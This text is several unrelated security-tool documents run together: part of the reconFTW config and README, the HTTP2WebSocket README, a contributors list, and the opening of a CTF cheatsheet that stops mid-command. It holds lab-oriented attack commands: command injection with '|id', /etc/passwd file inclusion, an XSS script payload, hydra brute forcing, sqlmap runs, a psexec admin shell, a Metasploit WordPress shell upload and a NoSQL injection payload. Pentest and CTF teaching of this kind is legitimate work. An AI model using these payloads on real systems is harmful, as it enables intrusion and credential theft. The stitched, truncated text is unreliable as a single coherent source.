TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003" # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true VIRTUALHOSTS=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CDN_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true PASSWORD_DICT=true PASSWORD_MIN_LENGTH=5 PASSWORD_MAX_LENGTH=14 # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DEEP_LIMIT2=1500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans FFUF_FLAGS="-mc all -fc 404 -ac -sf -s" # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=20 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 GAU_THREADS=10 DNSTAKE_THREADS=100 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 PUREDNS_WILDCARDTEST_LIMIT=30 PUREDNS_WILDCARDBATCH_LIMIT=1500000 WEBSCREENSHOT_THREADS=200 GOWITNESS_THREADS=8 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 DNSVALIDATOR_THREADS=200 INTERLACE_THREADS=10 CERO_THREADS=1000 # Rate limits HTTPX_RATELIMIT=150 NUCLEI_RATELIMIT=150 FFUF_RATELIMIT=0 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) # AXIOM=false Uncomment only to overwrite command line flags AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=5 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments #AXIOM_EXTRA_ARGS="--rm-logs" # Example # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME="user" BBRF_PASSWORD="password" # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' byellow='\033[1;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' yellow='\033[0;33m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | | -q | Rate limit in requests per second | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information ([domainbigdata](https://domainbigdata.com/) and [amass](https://github.com/OWASP/Amass)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester) and [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([degoogle_hunter](https://github.com/six2dez/degoogle_hunter)) - Github Dorks ([gitdorks_go](https://github.com/damit5/gitdorks_go)) ## Subdomains - Passive ([amass](https://github.com/OWASP/Amass) and [github-subdomains](https://github.com/gwen001/github-subdomains)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr)) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - TLS handshake ([cero](https://github.com/glebarez/cero)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig)) - Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum)) ## Hosts - IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/) - CDN checker ([ipcdn](https://github.com/six2dez/ipcdn)) - WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [nrich](https://gitlab.com/shodan-public/nrich)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gau](https://github.com/lc/gau), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [LinkFinder](https://github.com/GerbenJavado/LinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Ansible + Terraform deployment over AWS - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## Support this project ### Buymeacoffee [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) ### DigitalOcean referral link <a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a> ### GitHub sponsorship [Sponsor](https://github.com/sponsors/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) [<img src="https://pbs.twimg.com/profile_images/1509304017993752578/qqcKUKZb_400x400.jpg" width="100" height=auto>](https://github.com/geeknik) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [Spyse](https://spyse.com/) - [Networksdb](https://networksdb.io/) - [Intelx](https://intelx.io/) - [BinaryEdge](https://www.binaryedge.io/) - [Censys](https://censys.io/) - [CIRCL](https://www.circl.lu/) - [Whoxy](https://www.whoxy.com/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
HTTP2WebSocket =============== **Latest release**: 1.0<br> **License**: GNU GPL HTTP2WebSocket is tool to translate HTTP/1.1 traffic into Web Sockets traffic. It can be used in conjunction with standard pentesting tools like sqlmap, dirb, commix or others.<br> It supports: * SSL (wss://) * Proxy * WS connection initiation based on HTTP Host header ## Requirements * request * websocket-client ```bash pip3 install request websocket-client ``` ## Installation No installation is required. ## Usage HTTP2WebSocket act as a proxy between HTTP and Web Socket connection. It expects HTTP incomming traffic and translates it to Web Socket application.<br> GET method is used to discover endpoinds.<br> POST method is used to sent data to a web socket application.<br> HTTP2WebSocket can work in two ways. The default one is passing the exact HTTP body to the web socket. The second one is passing only the value of the parameter provided.<br> HTTP2WebSocket can be binded to a specific application (-t parameter) or it can be provided in each HTTP request through Host header. ## Examples Examples are based on Damn Vulnerable Web Socket virtual machine.<br> Details on how to setup DVWS here: [DVWS](https://github.com/interference-security/DVWS)<br> Docker image of DVWS: [DVWS docker image](https://github.com/tssoffsec/docker-dvwsocket) ### One WS app - full POST body Run the listener on port 3333 and connect to dvws.local:8080 web socket app on every HTTP request: ```bash python3 HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080 ``` Brute force: ```bash for i in 'abc' 'qwe' 'admin' 'asd' 'zxc'; do echo -n $i|base64; done > dict-passwords.b64 hydra -t 1 -L dict-passwords.b64 -P dict-passwords.b64 -s 3333 127.0.0.1 http-form-post /authenticate-user-prepared:'{"auth_user"\:"^USER^","auth_pass"\:"^PASS^"}':Incorrect ``` Command execution: ```bash curl "http://127.0.0.1:3333/command-execution" -d '|id' ``` File inclusion: ```bash curl --data '/etc/passwd' 127.0.0.1:3333/file-inclusion ``` Error SQL injection: ```bash sqlmap -u http://127.0.0.1:3333/authenticate-user --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --banner ``` Blind SQL injection: ```bash sqlmap -u http://127.0.0.1:3333/authenticate-user-blind --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --banner ``` Reflected XSS: ```bash python2 xsssniper.py -u http://127.0.0.1:3333/reflected-xss --post --data="whatever" ``` Stored XSS: ```bash curl http://127.0.0.1:3333/post-comments --data '{"name":"zzz","comment":"<script>alert(1111)</script>"}' curl http://127.0.0.1:3333/show-comments -X POST ``` Discovering endpoints: ```bash dirb http://127.0.0.1:3333/ endpoints-wordlist.txt ``` Other stuff: ```bash nikto -host http://127.0.0.1:3333/ ``` ### One WS app - POST body parameter value Run the listener on port 4444 and connect to dvws.local:8080 web socket app on every HTTP request.<br> It sends value of the HTTP POST body parameter *fuzz*. Some tools (E.g. commix) don't recognise plain body which is used by WS app.<br> ```bash python3 HTTP2WebSocket.py -l 4444 -t ws://dvws.local:8080 -P fuzz ``` Command execution: ```bash python2 commix.py --url "http://127.0.0.1:4444/command-execution" --data "fuzz=127.0.0.1" --skip-empty --technique=C --hostname ``` File inclusion : ```bash python2 fimap.py -s -b --no-auto-detect -u "http://127.0.0.1:4444/file-inclusion" -P "fuzz=xxx" ``` ### Multiple WS apps - full POST body Run the listener on port 5555. Take Host header from each HTTP request and use it as a target WS application.<br> *NOTE: Protocol type has to be provided in HTTP Host header (E.g. Host: wss://localhost:1234)* ```bash python3 HTTP2WebSocket.py -l 5555 ``` Brute force: ```bash hydra -t 1 -L dict-passwords.b64 -P dict-passwords.b64 -s 5555 127.0.0.1 http-form-post /authenticate-user-prepared:'{"auth_user"\:"^USER^","auth_pass"\:"^PASS^"}':Incorrect:"H=Host: ws\://dvws.local\:8080" ``` Command execution: ```bash curl "http://127.0.0.1:5555/command-execution" -d '|id' -H 'Host: ws://dvws.local:8080' ``` Discover endpoints: ```bash dirb http://127.0.0.1:5555/ ~/endpoints-wordlist.txt -H Host:ws://dvws.local:8080 ``` Other: ```bash nikto -host http://127.0.0.1:5555/ -vhost ws://dvws.local:8080 ``` ### Multiple WS apps - POST body parameter value Run the listener on port 6666. Take Host header from HTTP request and use it as a target WS application.<br> In this example actual data which is passed to the web socket application is the value of the *fuzz* parameter. ```bash python3 HTTP2WebSocket.py -l 6666 -P fuzz ``` Command execution: ```bash python2 commix.py --url "http://127.0.0.1:6666/command-execution" --data "fuzz=127.0.0.1" --skip-empty --technique=C --hostname --host="ws://dvws.local:8080" ``` File inclusion: ```bash curl --data '/etc/passwd' 127.0.0.1:6666/file-inclusion -H 'Host: ws://dvws.local:8080' ``` Error SQL injection: ```bash sqlmap -u http://127.0.0.1:6666/authenticate-user --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --banner --host="ws://dvws.local:8080" ``` Blind SQL injection: ```bash sqlmap -u http://127.0.0.1:6666/authenticate-user-blind --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --banner --host=ws://dvws.local:8080 ``` ### All options example Single example of all the options of HTTP2WebSocket:<br> In this example actual data which is passed to the web socket application is the value of the *fuzz* parameter. ```bash python HTTP2WebSocket.py -l 7777 -t wss://dvws.local:8765 -P fuzz -v -k -p 127.0.0.1:8080 ``` |Parameter|Description| |---|---| |*-l 7777*|Listen on port 7777/TCP| |*-t wss://dvws.local:8765*|Bind to dvws.local:8765 WS application through SSL| |*-P fuzz*|Extract the value of the POST body parameter named *fuzz* and pass it to WS application| |*-v*|Verbose mode| |*-k*|Ignore SSL warnings and errors| |*-p 127.0.0.1:8080*|Send all traffic through jttp proxy: 127.0.0.1:8080| Sending simple request: ```bash curl http://127.0.0.1:7777/authenticate-user -v -d 'fuzz=dawid' ```
# Contributors This is a list of people who have contributed to the [bugbounty-tools](https://github.com/maurosoria/bugbounty-tools) project. Contributions can come in many forms: coding, documentation, testing, discussions, and more. We follow the [all-contributors](https://allcontributors.org/) specification and use the [emoji key](https://allcontributors.org/docs/en/emoji-key) to acknowledge different contributions. ## Contributors This project exists thanks to all the people who contribute: ### Core Contributors - **[Mauro Soria](https://github.com/maurosoria)**: [📖](https://github.com/maurosoria/bugbounty-tools/commits?author=maurosoria "Documentation") [💻](https://github.com/maurosoria/bugbounty-tools/commits?author=maurosoria "Code") [📆](https://github.com/maurosoria/bugbounty-tools/commits?author=maurosoria "Project Management") [🔧](https://github.com/maurosoria/bugbounty-tools/commits?author=maurosoria "Maintenance") ### Other Contributors - **[Ruevaughn](https://github.com/ruevaughn)**: [💻](https://github.com/maurosoria/bugbounty-tools/commits?author=ruevaughn "Code") [👀](https://github.com/maurosoria/bugbounty-tools/pulls?q=reviewed-by%3Aruevaughn "Reviewed Pull Requests") [🔧](https://github.com/maurosoria/bugbounty-tools/commits?author=ruevaughn "Maintenance") --- The emoji key from all-contributors specification is: - 💻: code - 📖: documentation - 🐛: bug report - 🤔: ideas, planning - 👀: review - 📆: project management - 🔧: maintenance --- Thank you to everyone who contributes to the [bugbounty-tools](https://github.com/maurosoria/bugbounty-tools) project! We appreciate your efforts and contributions.
# Awesome CTF Cheatsheet [![Awesome](https://awesome.re/badge-flat.svg)](https://awesome.re)[<img src="media/icons8-hacking.svg" align="right" width="150">](https://uppusaikiran.github.io/hacking/Capture-the-Flag-CheatSheet/) > A currated list of all capture the flag tips and strategies to solve Online CTF challenges and Hackthebox Machines. --- ## Contents <!-- toc --> - [System Hacking](#system-hacking) - [Nmap Scanning](#nmap-scanning) - [Netdiscover Scanning](#netdiscover-scanning) - [Nikto Scanning](#nikto-scanning) - [WebServer is Open](#webserver-is-open) - [Directory Bursting](#directory-bursting) - [SMB is Open](#smb-is-open) - [To Extract and Mount VHD Drive Files](#to-extract-and-mount-vhd-drive-files) - [To search for Exploits on Metasploit by Name](#to-search-for-exploits-on-metasploit-by-name) - [Wordpress Open](#wordpress-open) - [RPC Open](#rpc-open) - [Powershell](#powershell) - [NOSql Code Injection](#nosql-code-injection) - [Web Hacking](#web-hacking) - [Five Stages of Web Hacking](#five-stages-of-web-hacking) - [Enumeration and Reconnaissance Tools](#enumeration-and-reconnaissance-tools) - [Scanning](#scanning) - [Payloads](#payloads) - [Shells](#shells) - [BufferOverflow](#bufferoverflow) - [Gobuster](#gobuster) - [SQLMAP](#sqlmap) - [File Hacking](#file-hacking) - [Extract hidden text from PDF Files](#extract-hidden-text-from-pdf-files) - [Compress File Extraction](#compress-file-extraction) - [Extract hidden strings](#extract-hidden-strings) - [Cryptography](#cryptography) - [Caesar Cipher](#caesar-cipher) - [Vigenere Cipher](#vigenere-cipher) - [One Time Pad Cipher](#one-time-pad-cipher) - [Forensics](#forensics) - [Image File](#image-file) - [Binwalk](#binwalk) - [Extract NTFS Filesystem](#extract-ntfs-filesystem) - [Recover Files from Deleted File Systems](#recover-files-from-deleted-file-systems) - [Packet Capture](#packet-capture) - [JavaScript Deobfuscator](#javascript-deobfuscator) - [Password Cracking](#password-cracking) - [JOHN the ripper](#john-the-ripper) - [SAM Hashes](#sam-hashes) - [Linux User Hashes](#linux-user-hashes) - [Hashcat](#hashcat) - [7z Password Cracking](#7z-password-cracking) - [SSH Password Cracking](#ssh-password-cracking) - [Privilige Escalation](#privilige-escalation) - [Standard Scripts for Enumeration](#standard-scripts-for-enumeration) - [Reconnoitre](#reconnoitre) <!-- tocstop --> ## System Hacking ### Nmap Scanning To scan for systems and Open Services/Ports, Use Nmap. ``` > $ namp -sV <HOST_IP> ``` To scan for Vulnerabilities on system. ``` > $ nmap --script vuln <HOST_IP> ``` To scan for all ports, SYN Scan and OS detection. ``` > $ nmap -sS -T4 -A -p- <HOST_IP> ``` To scan using inbuilt nmap scripts. ``` > $ nmap --script ssl-enum-ciphers -p 443 <HOST_IP> ``` ### Netdiscover Scanning To passively discover machines on the network, Use Netdiscover. ``` > $ netdiscover -i <INTERFACE> Currently scanning: 192.168.17.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 8 hosts. Total size: 480 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.1 11:22:33:44:55:66 1 60 NETGEAR 192.168.1.2 21:22:33:44:55:66 1 60 Apple, Inc. 192.168.1.8 41:22:33:44:55:66 1 60 Intel Corporate ``` ### Nikto Scanning To scan for vulnerabilities use Nikto. ``` > $ nikto -h <HOST_IP> ``` ### WebServer is Open If Port 80 or 443 is open, we can look for robots.txt to check for hidden flags or clues. To find the Webserver version, Use Curl tool with `I` flag. ``` > $ curl -I <SERVER_IP> HTTP/1.1 200 OK Date: Mon, 11 May 2020 05:18:21 Server: gws Last-Modified: Mon, 11 May 2020 05:18:21 Content-Length: 4171 Content-Type: text/html Connection: Closed ``` If Port 80 is Closed and its the only port opened on the machine, it can be due to presence of IDS or Port knocking. - We can give a timeout and try scanning after sometime to check if the port is still closed. - To check if Port is Open without knocking on IDS using TCP Scan instead of SYN Scan. ``` > $ nmap -p 80 <SERVER_IP> -sT Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 10.10.10.168 Host is up (0.038s latency). PORT STATE SERVICE 80/tcp closed http Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds ``` ### Directory Bursting To enumerate directories on a webserver, Use wfuzz. ``` > $ wfuzz -u http://<SERVER_IP>/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://<SERVER_IP>/FUZZ/ ``` ### SMB is Open If SMB has misconfigured anonymous login, Use smbclient to list shares. ``` > $ smbclient -L \\\\<HOST_IP> ``` If SMB Ports are open, we can look for anonymous login to mount misconfigured shares. ``` > $ mkdir /mnt/smb > $ mount -t cifs //<REMOTE_SMB_IP>/<SHARE> /mnt/smb/ Password for root@//<HOST_IP>/<SHARE>: ``` If we found Administrator Credentials for SMB, Access the root shell using this method. ``` > $ /opt/impacket/examples# smbmap -u administrator -p password -H <HOST_IP> [+] Finding open SMB ports.... [+] User SMB session establishd on <HOST_IP>... [+] IP: <HOST_IP>:445 Name: <HOST_IP> Disk Permissions ---- ----------- ADMIN$ READ, WRITE Backups READ, WRITE C$ READ, WRITE IPC$ READ ONLY > $ /opt/impacket/examples# python psexec.py administrator@<HOST_IP> Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation Password: [*] Requesting shares on <HOST_IP>..... [*] Found writable share ADMIN$ [*] Uploading file tJJmcVQN.exe [*] Opening SVCManager on <HOST_IP>..... [*] Creating service RKAe on <HOST_IP>.... [*] Starting service RKAe..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32> ``` ### To Extract and Mount VHD Drive Files ``` > $ 7z l <FILENAME>.vhd 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz (306D4),ASM,AES-NI) Scanning the drive for archives: 1 file, 5418299392 bytes (5168 MiB) Listing archive: <FILENAME>.vhd > $ guestmount --add <VHD_NAME>.vhd --inspector -ro -v /mnt/vhd ``` ### To search for Exploits on Metasploit by Name ``` > $ searchsploit apache 1.2.4 ``` ### Wordpress Open If `/wp-login.php` is found in the Enumeration scanning, it can be Wordpress site. To crack the login credentials for Wordpress, Use Hydra. We can use Burpsuite to capture the request parameters ``` > $ hydra -V -l wordlist.dic -p 123 <HOST_IP> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid Username ``` To scan Wordpress site for Vulnerabilities. ``` > $ gem install wpscan > $ wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic ``` To get a reverse shell using Admin Upload. ``` > $ msfconsole > $ use exploit/unix/webapp/wp_admin_shell_upload ``` ### RPC Open If RPC is open, we can login using rpclient. ``` > $ rpcclient -U "" <HOST_IP> ``` ### Powershell To bypass execution policy ``` > $ powershell.exe -exec bypass ``` ### NOSql Code Injection ``` username[$ne]=help&password[$ne]=help&login=login ``` ## Web Hacking ### Five Stages of Web Hacking ``` * Reconnaissance * Scanning and Enumeration * Gaining Access * Maintaining Access * Covering Tracks ``` ### Enumeration and Reconnaissance Tools - Whois, Nslookup, Dnsrecon, Google Fu, Dig - To passively enumerate website. - [Sublist3r](https://github.com/aboul3la/Sublist3r) - Subdomains enumeration tool. - [crt.sh](https://crt.sh) - Certificate enumeration tool. - [Hunter.io](https://hunter.io/) - Email enumeration tool. - Nmap, Wappalyzer, Whatweb, Builtwith, Netcat - Fingerprinting tools. - HaveIbeenPwned - Useful for breach enumeraton. - Use [SecurityHeaders](https://securityheaders.com/) to find some misconfigured header information on target website. - Use Zap Proxy tool to extract hidden files/directories. - Clear Text Passwords [Link](https://github.com/philipperemy/tensorflow-1.4-billion-password-analysis) To gather information from online sources. ``` > $ theharvester -d microsoft.com -l 200 -g -b google ``` ### Scanning Ping Sweep a network. ``` > $ nmap -sn <NETWORK> ``` SYN Scan with Speed of 4 and port of common 1000 TCP. ``` > $ nmap -T4 